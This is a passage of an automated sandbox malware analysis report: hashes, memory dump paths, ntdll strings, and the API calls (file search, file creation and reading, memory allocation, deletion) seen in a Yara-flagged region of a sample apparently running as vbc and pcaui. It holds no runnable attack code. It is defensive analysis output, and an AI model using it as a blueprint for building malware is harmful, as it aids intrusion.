                                                                                    • Opcode ID: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                                                    • Instruction ID: a78c4f149e33e8fed33722ac680547a12f99f960477c9d5f2fe9fb26a12dbc11
                                                                                    • Opcode Fuzzy Hash: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                                                    • Instruction Fuzzy Hash: 2490023630141406D10075985448646416587E0301F95D011AA028555EC6698D956532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                                                    • Instruction ID: 133d57a36cd9653ea4ff71393fe248b320ab727ce5aac701d2a297a408a00bcb
                                                                                    • Opcode Fuzzy Hash: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                                                    • Instruction Fuzzy Hash: BA90022670541406D14071585458706417587D0201F95D011A5028554DC65D8F596AB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                                                    • Instruction ID: 8654dfbd9b569d95c42a966f1d4d6c7c21f5678f39e8c196197a6d2c0e2ededa
                                                                                    • Opcode Fuzzy Hash: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                                                    • Instruction Fuzzy Hash: 0A90023630141407D10071585548707416587D0201F95D411A5428558DD65A8D556532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                                                    • Instruction ID: 55a711580d31ed4bd4e8fbb2e0bea262d9e730a930e72696261648cf3c60bf43
                                                                                    • Opcode Fuzzy Hash: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                                                    • Instruction Fuzzy Hash: 9790023630141846D10071584444B46416587E0301F95C016A5128654D8619CD557932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                                                    • Instruction ID: a8a76ef46d38429bb5c85e5a3792ae1eda3d38ed171d4570baa7b98a744dcbc8
                                                                                    • Opcode Fuzzy Hash: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                                                    • Instruction Fuzzy Hash: AA90023630181406D1007158485470B416587D0302F95C011A6168555D86298D556972
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                                                    • Instruction ID: 63bec600236497022134753adea615de5efaef7c3534b29272ab9fbe87ef28f0
                                                                                    • Opcode Fuzzy Hash: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                                                    • Instruction Fuzzy Hash: 4290023630181406D10071584848747416587D0302F95C011AA168555E8669CD956932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                                                    • Instruction ID: 35196ec29855047fd303dfa2815cd6001acebc040e89584b407f942967f90691
                                                                                    • Opcode Fuzzy Hash: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                                                    • Instruction Fuzzy Hash: 99900226701410464140716888849068165ABE1211795C121A599C550D855D8D695A76
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                                                    • Instruction ID: 076d06649f0bb863efb2c68677fe0ad041fefa780b13b3217dce8012c366944a
                                                                                    • Opcode Fuzzy Hash: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                                                    • Instruction Fuzzy Hash: 6D900226311C1046D20075684C54B07416587D0303F95C115A5158554CC9198D655932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                                                    • Instruction ID: 2c7ff88f4bd3b78df9bc7978d92964115453eace1cbc3e6afb88059d8e3dca52
                                                                                    • Opcode Fuzzy Hash: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                                                    • Instruction Fuzzy Hash: 8490026634141446D10071584454B064165C7E1301F95C015E6068554D861DCD566537
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                                                    • Instruction ID: 6f1977711fdf9236d4c52d9bd34bc22c56445acf8c8da7e6de7cfc7de8306834
                                                                                    • Opcode Fuzzy Hash: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                                                    • Instruction Fuzzy Hash: 9F90026631141046D1047158444470641A587E1201F95C012A7158554CC52D8D655536
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                                                    • Instruction ID: e73fe5ccc357356f5cac764e49ebc56a20e155419506f5fdde94e9e8e7bb17d0
                                                                                    • Opcode Fuzzy Hash: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                                                    • Instruction Fuzzy Hash: B590022670141506D10171584444616416A87D0241FD5C022A6028555ECA298E96A532
                                                                                    Memory Dump Source
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                                                    • Instruction ID: b8b8133937d35484b50f03cb6e4c44b4e43a17056b0d5d4cf19e3c576f0a7098
                                                                                    • Opcode Fuzzy Hash: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                                                    • Instruction Fuzzy Hash: 6151EBB5A0411ABFCB14DB9C889497EFBF9FB0C200B54816DECDAD7681E634DE0487A0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: a9daa4a7edabeae7745a6f4db823689bfa614ce018c17aab8f7c1b62669442bf
                                                                                    • Instruction ID: c55d612f327b2494068afe5cc4e8d28de20195dc932ad5a7db7861842307f4a9
                                                                                    • Opcode Fuzzy Hash: a9daa4a7edabeae7745a6f4db823689bfa614ce018c17aab8f7c1b62669442bf
                                                                                    • Instruction Fuzzy Hash: 41510379B04645EECF30DF9CC89597FB7FEEB48200B448869E896D7641EA74EE008761
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058F46FC
                                                                                    • Execute=1, xrefs: 058F4713
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 058F4742
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 058F4655
                                                                                    • ExecuteOptions, xrefs: 058F46A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 058F4725
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 058F4787
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                                                    • Instruction ID: 8de5f2b2e89815e4d8e201249c3e70742734e39bdc983c9f3e63af8b85725f5d
                                                                                    • Opcode Fuzzy Hash: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                                                    • Instruction Fuzzy Hash: 9051E73160431D6AEF10EA68DC99FFA77ADFB49304F040099ED05E7291EBB09E45CB55
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: e6f8a4cfd6d4e893356fe3e41cd4c2b82b304ca20aa30439299803e5fd04c29d
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 84816D70A49A499BDF24CE68C853BBEBFA2BF45352F98419DDC92E7290C734DC408B51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    • Opcode ID: 432b65519e1ea0420fce93c845319ef2219ea8bb17fb5981fc848bf9cc7da221
                                                                                    • Instruction ID: a037f168af862ed030bfff1c124818f1280c2ebaa4b039d182677948ab05a651
                                                                                    • Opcode Fuzzy Hash: 432b65519e1ea0420fce93c845319ef2219ea8bb17fb5981fc848bf9cc7da221
                                                                                    • Instruction Fuzzy Hash: 7521537AA00219EBCB10DFA9CE45AFEBBFDEF44644F040166ED45D3200EB30D9019BA1
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058F02BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058F02E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                                                    • Instruction ID: b322f39fcb23e464dbb4a3cedfe95021225df058b65b81e5adaad892ea21337e
                                                                                    • Opcode Fuzzy Hash: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                                                    • Instruction Fuzzy Hash: 5FE19D35608745DFE725CF28C888B2AB7E1BB88314F140A59EAA6CB2D1D774ED44CB52
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F7BAC
                                                                                    • RTL: Resource at %p, xrefs: 058F7B8E
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 058F7B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                                                    • Instruction ID: 1a8e9b0f80d436739cf9dcc25ee3a47e7db1cc29561ae338e43b47dd248b5fce
                                                                                    • Opcode Fuzzy Hash: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                                                    • Instruction Fuzzy Hash: 214190317047069FE720DE298840B6AB7EAEB89711F100A1DED9AD7780DB71E905CB91
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058F728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F72C1
                                                                                    • RTL: Resource at %p, xrefs: 058F72A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 058F7294
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                                                    • Instruction ID: aa99eb68d245e4a3ade4dca369a9ddfa8b295d8daedcf2bcc4a2be51b9dc1640
                                                                                    • Opcode Fuzzy Hash: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                                                    • Instruction Fuzzy Hash: 2A41AC31704206ABE721DE25CC41FAAB7E6FB88715F100619ED56EB380DB71EC52CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 4f1f1fddbffb9d53358a2e53dda37e3584fd3c6ec7ecbcd76a549a72d2de86a1
                                                                                    • Instruction ID: 1c729d2a9f2b4917b71eb7a5327c6c3ff54f5c9d147e35649ab5946a5b89f108
                                                                                    • Opcode Fuzzy Hash: 4f1f1fddbffb9d53358a2e53dda37e3584fd3c6ec7ecbcd76a549a72d2de86a1
                                                                                    • Instruction Fuzzy Hash: 75314176A00219DFCB20DF29DC45BEEB7F9FB44650F44455AE849E7240EB30EA449BA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: e9491f2c6b8e202d4cf83bbe625c599dc4217d1d2f9e5faccd44b52b0f84549d
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 7391AE71E1420A9ADB24DE69C881ABEBFA6FF45720F14459EEC65E72C0E730DD418F20
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                                                    • Instruction ID: ec018552d137b5ccff5d8adadf4cf4045f39d5c9233c3e71e9c0e8672724541c
                                                                                    • Opcode Fuzzy Hash: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                                                    • Instruction Fuzzy Hash: 98812975D042699BDB25DB54CC44BEAB7B8BB09710F0441EAED1AF7240D7309E81CFA1

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.5%
                                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                                    Signature Coverage:1.6%
                                                                                    Total number of Nodes:442
                                                                                    Total number of Limit Nodes:72

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &Z$)#$0a$66$=]$A$C$LF$MW$Py$X,$[$]s$_n`3$`3$a)$ao$gn$m$nK$nv$s:$t$t?$td$tn$w($G$|
                                                                                    • API String ID: 0-31118547
                                                                                    • Opcode ID: 7ab0c46a844c4997754260ef2203b7807d13e617a6b3dca20b8989287e2fc922
                                                                                    • Instruction ID: 5175fdf5d7a190a02b2d63e7e36fd7961f805bd69e74ce11cb6c3be771c77448
                                                                                    • Opcode Fuzzy Hash: 7ab0c46a844c4997754260ef2203b7807d13e617a6b3dca20b8989287e2fc922
                                                                                    • Instruction Fuzzy Hash: 404292B8D05228CBEB68CF84CD947DDBBB1BB45308F1081DAC649BB281D7B95A84CF55
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0281CA04
                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0281CA3F
                                                                                    • FindClose.KERNELBASE(?), ref: 0281CA4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                    • Instruction ID: 7d01b2a025edf5a055cb99d9f753254eda8272e468255894fb41e7a3939a5dfd
                                                                                    • Opcode Fuzzy Hash: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                    • Instruction Fuzzy Hash: A431C3B9A40308BBDB21DB64CC84FEF777D9B45704F144459B509E75C0D770AA848BA2
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 028295BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                    • Instruction ID: cb3b1d973d26258575c00d7a383dd3356bfdcff4beeb96e411d25c4666465394
                                                                                    • Opcode Fuzzy Hash: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                    • Instruction Fuzzy Hash: DC31B8B9A11609AFCB44DF98D881EEF77B9EF8C314F108219F919A7340D730A951CBA5
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02829716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                    • Instruction ID: 11849a9fe948c9351c5923a1460ee288922d298191ec3e577e0e72c594337846
                                                                                    • Opcode Fuzzy Hash: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                    • Instruction Fuzzy Hash: 9431C9B9A00608ABDB04DF98D881EEF77B9AF8C314F108119F919A7240D770A955CFA5
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(028120FE,?,028282AE,00000000,00000004,00003000,?,?,?,?,?,028282AE,028120FE,028282AE,00000000), ref: 02829A0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                    • Instruction ID: f9b10938c3c8309650a4ec391492cf101585a2f7878f8aef222f9422a5aadb00
                                                                                    • Opcode Fuzzy Hash: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                    • Instruction Fuzzy Hash: 91212BB9A00219AFDB14DF98DC81FEFB7B9EF88710F108119FD19A7240D770A9518BA5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                    • Instruction ID: 71680fc5d5836b7648f36b0d747ade3351b0eecc47f9ea596c8bc9bf76ebf97e
                                                                                    • Opcode Fuzzy Hash: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                    • Instruction Fuzzy Hash: 0111C239A00618BFD614EBA8DC41FEBB7ADDF85314F008509F90DA7280D7707A558BA6
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02829807
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction ID: eb0e44a5298bd3768fcabf3b8c13d211e1c31297767043accc130b9bfcf2585a
                                                                                    • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction Fuzzy Hash: 4BE0463A200614BBD220AA99DC41FDB77AEDFC5724F008419FA0DAB281C671B9158BF1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
